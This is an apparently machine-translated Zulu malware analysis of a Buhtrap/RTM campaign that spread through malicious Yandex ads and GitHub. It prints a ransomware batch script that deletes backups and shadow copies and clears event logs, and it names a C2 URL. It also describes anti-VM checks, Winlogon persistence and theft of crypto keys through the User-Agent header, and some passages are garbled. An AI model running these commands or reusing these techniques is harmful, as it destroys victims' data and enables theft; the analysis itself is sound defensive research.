Ukukhomba ababaleki ekuhlaselweni ku-inthanethi, ungasebenzisa imibhalo yomsebenzi abayifunayo ku-inthanethi. Lokhu cishe yilokho obekwenziwa iqembu le-inthanethi ezinyangeni ezimbalwa ezedlule, lisakaza iminyango eyaziwayo. и , kanye nama-encryptor nesofthiwe yokweba ama-cryptocurrencies. Izinhloso eziningi zitholakala eRussia. Ukuhlasela kwenziwe ngokubeka ukukhangisa okunonya ku-Yandex.Direct. Abangase babe izisulu baqondiswe kuwebhusayithi lapho becelwe khona ukuthi balande ifayela eliyingozi elifihlwe njengesifanekiso sedokhumenti. I-Yandex isuse ukukhangisa okunonya ngemva kwesixwayiso sethu.
Ikhodi yomthombo ye-Buhtrap iputshuzwe ku-inthanethi esikhathini esedlule ukuze noma ubani akwazi ukuyisebenzisa. Asinalo ulwazi mayelana nokutholakala kwekhodi ye-RTM.
Kulokhu okuthunyelwe sizokutshela ukuthi abahlaseli basabalalisa kanjani uhlelo olungayilungele ikhompuyutha besebenzisa i-Yandex.Direct futhi baluphathe ku-GitHub. Okuthunyelwe kuzophetha ngokuhlaziywa kobuchwepheshe kohlelo olungayilungele ikhompuyutha.
I-Buhtrap ne-RTM sezibuyile ebhizinisini
Indlela yokusabalalisa kanye nezisulu
Imithwalo ehlukahlukene ekhokhelwayo elethwa izisulu ihlanganyela ngendlela efanayo yokusabalalisa. Wonke amafayela anonya adalwe abahlaseli abekwe kumakhosombe amabili ahlukene e-GitHub.
Ngokuvamile, inqolobane yayiqukethe ifayela elilodwa elinonya elilandekayo, elalishintsha njalo. Njengoba i-GitHub ikuvumela ukuthi ubuke umlando wezinguquko endaweni yokugcina, singabona ukuthi iyiphi i-malware esatshalaliswe ngesikhathi esithile. Ukukholisa isisulu ukuthi silande ifayela eliyingozi, kusetshenziswe iwebhusayithi blanki-shabloni24[.]ru, eboniswe esithombeni esingenhla.
Ukuklanywa kwesayithi kanye nawo wonke amagama amafayela anonya alandela umqondo owodwa - amafomu, izifanekiso, izinkontileka, amasampula, njll. Ngokucabangela ukuthi isofthiwe ye-Buhtrap ne-RTM isivele isetshenziswe ekuhlaselweni kwama-accountant esikhathini esidlule, sicabange ukuthi isu emkhankasweni omusha liyafana. Umbuzo kuphela ukuthi isisulu sifike kanjani endaweni yabahlaseli.
Ukutheleleka
Okungenani abambalwa abangaba izisulu abagcine bekuleli sayithi bakhangwe ukukhangisa okunonya. Ngezansi isibonelo se-URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Njengoba ubona kusixhumanisi, isibhengezo sithunyelwe kuforamu yokubala esemthethweni bb.f2[.]kz. Kubalulekile ukuqaphela ukuthi izibhengezo zivele kumasayithi ahlukene, zonke zine-id yomkhankaso efanayo (blanki_rsya), futhi iningi elihlobene nokubalwa kwezimali noma izinsiza zomthetho. I-URL ibonisa ukuthi ongase abe isisulu usebenzise isicelo “sokulanda ifomu le-invoyisi,” elisekela umbono wethu wokuhlasela okuqondiwe. Ngezansi kukhona amasayithi lapho izibhengezo zivele khona kanye nemibuzo yosesho ehambisanayo.
- landa ifomu le-invoyisi – bb.f2[.]kz
- isampula yenkontileka - Ipopen[.]ru
- isicelo isampula isikhalazo - 77metrov[.]ru
- ifomu lesivumelwano - blank-dogovor-kupli-prodazhi[.]ru
- isampula yesicelo senkantolo - zen.yandex[.]ru
- isampula yesikhalazo - yurday[.]ru
- isampula yamafomu enkontileka - Regforum[.]ru
- ifomu lenkontileka - assistentus[.]ru
- isampula yesivumelwano sefulethi – napravah[.]com
- amasampula ezinkontileka zomthetho - avito[.]ru
Isizinda se-blanki-shabloni24[.]ru kungenzeka silungiselelwe ukuthi siphumelele ukuhlola okubonakalayo okulula. Ngokuvamile, isikhangiso esikhomba isayithi elibukeka kahle elinesixhumanisi esiya ku-GitHub asibonakali njengento embi ngokusobala. Ngaphezu kwalokho, abahlaseli balayishe amafayela anonya endaweni yokugcina isikhathi esilinganiselwe, cishe phakathi nomkhankaso. Isikhathi esiningi, inqolobane ye-GitHub ibiqukethe ingobo yomlando ye-zip engenalutho noma ifayela le-EXE elingenalutho. Ngakho, abahlaseli bangasabalalisa ukukhangisa nge-Yandex.Direct kumasayithi okungenzeka avakashelwe ama-accountant abeze ephendula imibuzo ethile yosesho.
Okulandelayo, ake sibheke imithwalo ekhokhelwayo ehlukahlukene esakazwa ngale ndlela.
I-Payload Analysis
Ukulandelana kwesikhathi kokusabalalisa
Umkhankaso ononya uqale ekupheleni kuka-Okthoba 2018 futhi uyasebenza ngesikhathi sokubhala. Njengoba yonke inqolobane ibitholakala esidlangalaleni ku-GitHub, sihlanganise umugqa wesikhathi onembile wokusatshalaliswa kwemindeni eyisithupha ehlukene yohlelo olungayilungele ikhompuyutha (bona isithombe esingezansi). Sengeze umugqa obonisa ukuthi isixhumanisi sesibhengezo sitholwe nini, njengoba kukalwa nge-ESET telemetry, ukuze kuqhathaniswe nomlando we-git. Njengoba ubona, lokhu kuhlobana kahle nokutholakala komthwalo okhokhelwayo ku-GitHub. Umehluko ekupheleni kukaFebhuwari ungachazwa yiqiniso lokuthi asizange sibe nengxenye yomlando woshintsho ngoba inqolobane yasuswa ku-GitHub ngaphambi kokuba siyithole ngokugcwele.
Umfanekiso 1. Ukuhlelwa kwesikhathi kokusabalalisa uhlelo olungayilungele ikhompuyutha.
Izitifiketi Zokusayina Ikhodi
Umkhankaso usebenzise izitifiketi eziningi. Amanye asayinwe umndeni ohlelo olungayilungele ikhompuyutha ongaphezu kowodwa, okubonisa ngokuqhubekayo ukuthi amasampuli ahlukene awomkhankaso ofanayo. Ngaphandle kokutholakala kokhiye oyimfihlo, o-opharetha abazange basayine ngokuhlelekile okuhamba ngakubili futhi abazange basebenzise ukhiye kuwo wonke amasampuli. Ngasekupheleni kukaFebruwari 2019, abahlaseli baqale ukudala amasiginesha angavumelekile besebenzisa isitifiketi se-Google ababengenawo ukhiye oyimfihlo waso.
Zonke izitifiketi ezibandakanyekayo emkhankasweni kanye nemindeni yohlelo olungayilungele ikhompuyutha abayisayinayo zifakwe kuhlu kuthebula elingezansi.
Siphinde sasebenzisa lezi zitifiketi zokusayina ikhodi ukuze sisungule izixhumanisi neminye imindeni ewuhlelo olungayilungele ikhompuyutha. Ezitifiketini eziningi, asiwatholanga amasampula angazange asatshalaliswe ngendawo yokugcina ye-GitHub. Nokho, isitifiketi se-TOV “MARIYA” sisetshenziswe ukusayinda uhlelo olungayilungele ikhompuyutha okuyingxenye ye-botnet , i-adware nabavukuzi. Akunakwenzeka ukuthi lolu hlelo olungayilungele ikhompuyutha luhlobene nalo mkhankaso. Ngokunokwenzeka, isitifiketi sathengwa ku-darknet.
Win32/Filecoder.Buhtrap
Ingxenye yokuqala esenze ukunaka kwethu kwakuyi-Win32/Filecoder esanda kutholwa.Buhtrap. Leli yifayela kanambambili le-Delphi elipakishwa ngezinye izikhathi. Yasatshalaliswa kakhulu ngoFebhuwari–Mashi 2019. Iziphatha ngendlela efanele uhlelo lwe-ransomware - isesha amadrayivu endawo namafolda enethiwekhi bese ibethela amafayela atholiwe. Ayidingi uxhumano lwe-inthanethi ukuze ibekwe engcupheni ngoba ayixhumani neseva ukuze ithumele okhiye bokubethela. Kunalokho, yengeza "ithokheni" ekupheleni komlayezo wesihlengo, futhi iphakamisa ukusebenzisa i-imeyili noma i-Bitmessage ukuze uxhumane nama-opharetha.
Ukuze ubethele izinsiza eziningi ezibucayi ngangokunokwenzeka, i-Filecoder.Buhtrap isebenzisa uchungechunge oluklanyelwe ukuvala isofthiwe engukhiye okungenzeka ibe nezibambi zefayela ezivulekile eziqukethe ulwazi olubalulekile olungaphazamisa ukubethela. Izinqubo okuhloswe ngazo amasistimu okuphathwa kwedathabhesi (DBMS). Ngaphezu kwalokho, i-Filecoder.Buhtrap isusa amafayela welogi nezipele ukuze yenze ukuthola idatha kube nzima. Ukuze wenze lokhu, sebenzisa i-batch script ngezansi.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
I-Filecoder.Buhtrap isebenzisa isevisi esemthethweni ye-inthanethi ye-IP Logger eklanyelwe ukuqoqa ulwazi mayelana nezivakashi zewebhusayithi. Lokhu kuhloselwe ukulandelela izisulu ze-ransomware, okungumsebenzi womugqa womyalo:
mshta.exe "javascript:document.write('');"
Amafayela okubethela akhethiwe uma engafani nezinhlu ezintathu zokukhishwa. Okokuqala, amafayela anezandiso ezilandelayo awabethelwe: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys kanye .bat. Okwesibili, wonke amafayela lapho indlela egcwele iqukethe amayunithi ezinhlamvu zohlu olungezansi awafakiwe.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Okwesithathu, amagama athile wamafayela nawo awafakiwe ekubethelweni, phakathi kwawo negama lefayela lomlayezo wesihlengo. Uhlu lwethulwe ngezansi. Ngokusobala, konke lokhu okuhlukile kuhloselwe ukugcina umshini usebenza, kodwa ngokufaneleka okuncane kokuba semgwaqweni.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Uhlelo lokubethela ifayela
Uma isikhishiwe, uhlelo olungayilungele ikhompuyutha lukhiqiza ipheya yokhiye we-RSA ongu-512-bit. I-eksponenti yangasese (d) kanye nemodulus (n) bese ibethelwa ngokhiye osesidlangalaleni onekhodi eqinile ongu-2048-bit (i-exponent yomphakathi nemodulus), i-zlib-packed, futhi i-base64 ibhalwe ngekhodi. Ikhodi enesibopho salokhu iboniswa kuMfanekiso 2.
Umfanekiso 2. Umphumela wokuchithwa kwe-Hex-Rays wenqubo yokupheqa ukhiye we-RSA ongu-512-bit.
Ngezansi kunesibonelo sombhalo ongenalutho onokhiye oyimfihlo okhiqiziwe, okuwuphawu olunamathiselwe kumlayezo wesihlengo.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Ukhiye osesidlangalaleni wabahlaseli unikezwe ngezansi.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Amafayela abethelwe kusetshenziswa i-AES-128-CBC ngokhiye ongu-256-bit. Kufayela ngalinye elibethelwe, ukhiye omusha kanye nevekhtha entsha yokuqalisa kukhiqizwa. Ulwazi olubalulekile lwengezwa ekugcineni kwefayela elibethelwe. Ake sicabangele ifomethi yefayela elibethelwe.
Amafayela abethelwe anesihloko esilandelayo:
Idatha yefayela elingumthombo ngokungezwa kwevelu yomlingo ye-VEGA ibethelwe kumabhayithi okuqala angu-0x5000. Lonke ulwazi lokukhipha ukubethela lunamathiselwe efayelini elinesakhiwo esilandelayo:
- Umaka wesayizi wefayela uqukethe umaki obonisa ukuthi ifayela likhulu kuno-0x5000 bytes ngosayizi
— Ibhulobhu yokhiye we-AES = ZlibCompress(RSAEncrypt(ukhiye we-AES + IV, ukhiye wasesidlangalaleni wamapheya okhiye we-RSA)
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA secret key, hard-coded RSA public key))
Win32/ClipBanker
I-Win32/ClipBanker iyingxenye eyasatshalaliswa ngezikhathi ezithile kusukela ngasekupheleni kuka-Okthoba kuya ekuqaleni kuka-December 2018. Indima yayo ukuqapha okuqukethwe ebhodini lokunamathisela, ibheka amakheli e-cryptocurrency wallet. Ngemva kokunquma ikheli le-wallet eliqondiwe, i-ClipBanker ilishintsha ifake ikheli okukholakala ukuthi ngelabasebenzisi. Amasampula esiwahlolile awazange afakwe emabhokisini futhi abengacaciswanga. Okuwukuphela kwendlela esetshenziswa ukufihla ukuziphatha ukubethela kweyunithi yezinhlamvu. Amakheli ewalethi yomsebenzisi abethelwe kusetshenziswa i-RC4. Ama-cryptocurrencies aqondiwe yi-Bitcoin, imali ye-Bitcoin, i-Dogecoin, i-Ethereum ne-Ripple.
Ngaleso sikhathi uhlelo olungayilungele ikhompuyutha lwalusabalala ezikhwameni ze-Bitcoin zabahlaseli, imali encane yathunyelwa kwa-VTS, okufaka ukungabaza empumelelweni yomkhankaso. Ukwengeza, abukho ubufakazi obuphakamisa ukuthi lokhu kuthenga bekuhlobene ne-ClipBanker nhlobo.
Win32/RTM
Ingxenye yeWin32/RTM yasatshalaliswa izinsuku ezimbalwa ekuqaleni kukaMashi 2019. I-RTM iyibhange leTrojan elibhalwe eDelphi, okuhloswe ngalo kumasistimu amabhange akude. Ngo-2017, abacwaningi be-ESET bashicilelwe yalolu hlelo, incazelo isabalulekile. NgoJanuwari 2019, iPalo Alto Networks nayo yakhululwa .
I-Buhtrap Loader
Isikhathi esithile, isilandi sasitholakala ku-GitHub esasingafani namathuluzi wangaphambilini we-Buhtrap. Aphendukele ku https://94.100.18[.]67/RSS.php?<some_id> ukuze uthole isigaba esilandelayo futhi usilayishe ngqo kumemori. Singakwazi ukuhlukanisa ukuziphatha okubili kwekhodi yesigaba sesibili. Ku-URL yokuqala, i-RSS.php idlule i-backdoor ye-Buhtrap ngokuqondile - le backdoor ifana kakhulu naleyo etholakala ngemva kokuputshuzwa kwekhodi yomthombo.
Kuyathakazelisa ukuthi sibona imikhankaso eminingana ene-Buhtrap backdoor, futhi kuthiwa iqhutshwa opharetha abahlukene. Kulokhu, umehluko omkhulu ukuthi i-backdoor ilayishwe ngqo enkumbulweni futhi ayisebenzisi uhlelo olujwayelekile ngenqubo yokuthunyelwa kwe-DLL esikhulume ngayo. . Ngaphezu kwalokho, opharetha bashintshe ukhiye we-RC4 osetshenziselwa ukubethela ithrafikhi yenethiwekhi kuseva ye-C&C. Emikhankasweni eminingi esiyibonile, opharetha abazange bazihluphe ngokushintsha lo khiye.
Okwesibili, ukuziphatha okuyinkimbinkimbi kwaba ukuthi i-URL ye-RSS.php yadluliselwa kwesinye isilayishi. Yenze i-obfuscation ethile, njengokwakha kabusha ithebula lokungenisa eliguqukayo. Injongo ye-bootloader iwukuxhumana neseva ye-C&C [.]com/api/F27F84EDA4D13B15/2, thumela izingodo bese ulinda impendulo. Icubungula impendulo njenge-blob, ilayishe enkumbulweni futhi iyenze. Umthwalo okhokhelwayo esiwubonile ukhipha lesi silayishi bekuyi-Buhtrap backdoor efanayo, kodwa kungase kube nezinye izingxenye.
Android/Spy.Banker
Kuyathakazelisa ukuthi ingxenye ye-Android nayo yatholakala endaweni yokugcina ye-GitHub. Wayesegatsheni elikhulu usuku olulodwa kuphela - Novemba 1, 2018. Ngaphandle kokuthunyelwa ku-GitHub, i-ESET telemetry ayitholi bufakazi balolu hlelo olungayilungele ikhompuyutha olusatshalaliswa.
Ingxenye isingathwe njengePhakheji Yohlelo Lokusebenza lwe-Android (APK). Kufihlwe kakhulu. Ukuziphatha okunonya kufihliwe ku-JAR ebethelwe etholakala ku-APK. Ibethelwe nge-RC4 kusetshenziswa lo khiye:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Ukhiye ofanayo kanye ne-algorithm isetshenziswa ukubethela amayunithi ezinhlamvu. I-JAR itholakala APK_ROOT + image/files. Amabhayithi okuqala angu-4 efayela aqukethe ubude be-JAR ebethelwe, eqala ngokushesha ngemva kwenkambu yobude.
Ngemva kokususa ukubethela kwefayela, sithole ukuthi kwakungu-Anubis - phambilini ibhange le-Android. Uhlelo olungayilungele ikhompuyutha lunezici ezilandelayo:
- ukuqoshwa kwemakrofoni
- ukuthatha izithombe-skrini
- ukuthola izixhumanisi ze-GPS
- keylogger
- ukubethela kwedatha yedivayisi kanye nesidingo sesihlengo
- ukuthumela ugaxekile
Kuyathakazelisa ukuthi umnikazi webhange usebenzise i-Twitter njengesiteshi sokuxhumana esiyisipele ukuze athole enye iseva ye-C&C. Isampula esisihlaziyile sisebenzise i-akhawunti ye-@JonesTrader, kodwa ngesikhathi sokuhlaziya yayisivele ivinjiwe.
Ibhange liqukethe uhlu lwezinhlelo zokusebenza eziqondiwe kudivayisi ye-Android. Lude kunohlu olutholwe ocwaningweni lwaseSophos. Uhlu luhlanganisa izicelo eziningi zokubhanga, izinhlelo zokuthenga nge-inthanethi ezifana ne-Amazon ne-eBay, kanye nezinsizakalo ze-cryptocurrency.
MSIL/ClipBanker.IH
Ingxenye yokugcina esatshalaliswa njengengxenye yalo mkhankaso kwakuyi-.NET Windows esebenzisekayo, evele ngoMashi 2019. Iningi lezinguqulo ezifundisiwe zahlanganiswa ne-ConfuserEx v1.0.0. Njenge-ClipBanker, le ngxenye isebenzisa ibhodi lokunamathisela. Umgomo wakhe izinhlobonhlobo eziningi ze-cryptocurrencies, kanye nezaphulelo ku-Steam. Ukwengeza, usebenzisa isevisi ye-IP Logger ukuze antshontshe ukhiye we-WIF oyimfihlo we-Bitcoin.
Izindlela Zokuvikela
Ngokungeziwe ezinzuzweni ezihlinzekwa yi-ConfuserEx ekuvimbeleni ukulungisa amaphutha, ukulahla, nokuphazamisa, ingxenye ihlanganisa ikhono lokubona imikhiqizo elwa namagciwane kanye nemishini ebonakalayo.
Ukuqinisekisa ukuthi isebenza ngomshini obonakalayo, uhlelo olungayilungele ikhompuyutha lusebenzisa ulayini womyalo we-Windows WMI (WMIC) owakhelwe ngaphakathi ukuze ucele ulwazi lwe-BIOS, okungukuthi:
wmic bios
Bese uhlelo ludlulisa okuphumayo komyalo bese lubheka amagama angukhiye: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Ukuthola imikhiqizo yokulwa namagciwane, uhlelo olungayilungele ikhompuyutha luthumela isicelo seWindows Management Instrumentation (WMI) ku-Windows Security Center sisebenzisa. ManagementObjectSearcher I-API njengoba kukhonjisiwe ngezansi. Ngemuva kokuqopha kusuka ku-base64 ucingo lubukeka kanje:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Umfanekiso 3. Inqubo yokuhlonza imikhiqizo ye-antivirus.
Ngaphezu kwalokho, uhlelo olungayilungele ikhompuyutha luyahlola ukuthi , ithuluzi lokuvikela ekuhlaselweni kwebhodi lokunamathisela futhi, uma isebenza, imisa okwesikhashana yonke imicu kuleyo nqubo, ngaleyo ndlela ikhubaze ukuvikela.
Ukuphikelela
Inguqulo yohlelo olungayilungele ikhompuyutha esifunde ngayo izikopishela kuyo %APPDATA%googleupdater.exe bese usetha isibaluli "esifihliwe" sohla lwemibhalo lwe-google. Bese eshintsha inani SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell kurejista yeWindows bese wengeza indlela updater.exe. Ngale ndlela, uhlelo olungayilungele ikhompuyutha luzosetshenziswa njalo uma umsebenzisi engena.
Ukuziphatha okunonya
Njenge-ClipBanker, uhlelo olungayilungele ikhompuyutha luqapha okuqukethwe ebhodini lokunamathisela futhi lubheke amakheli esikhwama semali ye-cryptocurrency, futhi lapho etholakala, ifaka elinye lamakheli omsebenzisi esikhundleni salo. Ngezansi kunohlu lwamakheli okuhlosiwe asekelwe kulokho okutholakala kukhodi.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Ohlotsheni ngalunye lwekheli kunenkulumo evamile ehambisanayo. Inani le-STEAM_URL lisetshenziselwa ukuhlasela isistimu ye-Steam, njengoba kungase kubonakale enkulumweni evamile esetshenziselwa ukuchaza ku-buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Isiteshi sokuhlunga
Ngokungeziwe ekushintsheni amakheli kusigcinalwazi, uhlelo olungayilungele ikhompuyutha luqondise okhiye abayimfihlo be-WIF bezikhwama ze-Bitcoin, Bitcoin Core kanye ne-Electrum Bitcoin. Uhlelo lusebenzisa i-plogger.org njengesiteshi sokuhlunga ukuze kutholwe ukhiye oyimfihlo we-WIF. Ukwenza lokhu, ama-opharetha engeza idatha yokhiye oyimfihlo kusihloko se-HTTP somenzeli womsebenzisi, njengoba kukhonjisiwe ngezansi.
Umfanekiso 4. Ikhonsoli ye-IP Logger enedatha yokuphumayo.
Abasebenzisi abazange basebenzise i-iplogger.org ukuze bakhiphe izikhwama zemali. Cishe basebenzise indlela ehlukile ngenxa yomkhawulo wezinhlamvu ezingu-255 ensimini User-Agentkuboniswe kusixhumi esibonakalayo sewebhu se-IP Logger. Kumasampuli esiwafundile, enye iseva yokuphumayo igcinwe ekuguquguqukeni kwemvelo DiscordWebHook. Ngokumangalisayo, lokhu kuhlukahluka kwemvelo akunikezwanga noma yikuphi kukhodi. Lokhu kuphakamisa ukuthi uhlelo olungayilungele ikhompuyutha lusathuthukiswa futhi okuguquguqukayo kwabelwa umshini wokuhlola wesisebenzisi.
Kunolunye uphawu lokuthi lolu hlelo seluthuthukile. Ifayela kanambambili lihlanganisa ama-URL amabili e-iplogger.org, futhi womabili ayabuzwa lapho idatha ikhishwa. Esicelweni kwenye yalawa ma-URL, inani enkambini ye-Referer landulelwa okuthi “DEV /”. Siphinde sathola inguqulo engazange ihlanganiswe kusetshenziswa i-ConfuserEx, umamukeli wale URL uqanjwe ngokuthi i-DevFeedbackUrl. Ngokusekelwe egameni eliguquguqukayo lendawo, sikholelwa ukuthi o-opharetha bahlela ukusebenzisa isevisi esemthethweni ye-Discord kanye nesistimu yayo yokuvimbela iwebhu ukuze bantshontshe izikhwama zemali ye-crypto.
isiphetho
Lo mkhankaso uyisibonelo sokusetshenziswa kwezinsizakalo zokukhangisa ezisemthethweni ekuhlaselweni ku-inthanethi. Uhlelo luqondise izinhlangano zaseRussia, kodwa ngeke simangale ukubona ukuhlasela okunjalo kusetshenziswa izinsiza ezingezona ezaseRussia. Ukuze ugweme ukungena ebucayini, abasebenzisi kufanele baqiniseke ngesithunzi somthombo wesofthiwe abayilandayo.
Uhlu oluphelele lwezinkomba zokuvumelana kanye nezibaluli ze-MITER ATT&CK zitholakala kokuthi .
Source: www.habr.com